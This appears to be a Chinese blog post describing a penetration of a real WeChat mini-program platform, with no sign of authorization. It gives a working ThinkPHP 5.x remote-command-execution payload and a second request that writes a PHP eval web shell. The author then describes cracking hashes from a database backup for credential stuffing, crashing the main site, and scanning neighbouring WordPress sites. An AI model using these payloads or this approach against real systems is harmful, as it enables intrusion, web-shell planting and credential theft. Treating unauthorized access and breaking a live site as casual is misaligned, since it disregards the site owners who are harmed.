一次日歪了的渗透测试
目标站: 某微信小程序diy平台
https://scan.dyboy.cn/web/webside tscan

找到一个thinkphp的站

想办法报个错看看版本 5.0.10

这个版本好多洞 尝试 ThinkPHP 5.x 远程命令执行漏洞
参考文章:https://blog.csdn.net/u010433704/article/details/103258291

就是程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
Payload:public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写shell
public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST['shell']);?>
蚁剑连接

发现个问题 好像日歪了 ip不对阿 发现一个数据库备份

md5解密去撞库 因为是他个人的qq号所以就打码了
其实到现在就开始出现了问题 因为主站那个后台我进去了之后查看功能的时候点了一下编译 大概是站点死循环了 联系管理员也不理 这就很尴尬了
通过https://ipchaxun.com/找到了几个旁站
访问/readme.html发现一个是wordpress的站 撞库失败

使用wpscan扫描一下 kali自带
sudo wpscan -url xxx.com --api-token
没有发现漏洞 版本是5.7.2 最新版本
| - server: nginx/1.19.10
| - x-powered-by: PHP/7.4.19
wp这个版本太高了没办法拿下
其实好多无关紧要的都没有写 wp的xss 还有好几个小网站的撞库 尽量赶在周一前把剩下的写完
等主站能打开了再写后续 又水一篇.......
本文迁移自知识星球“火线Zone”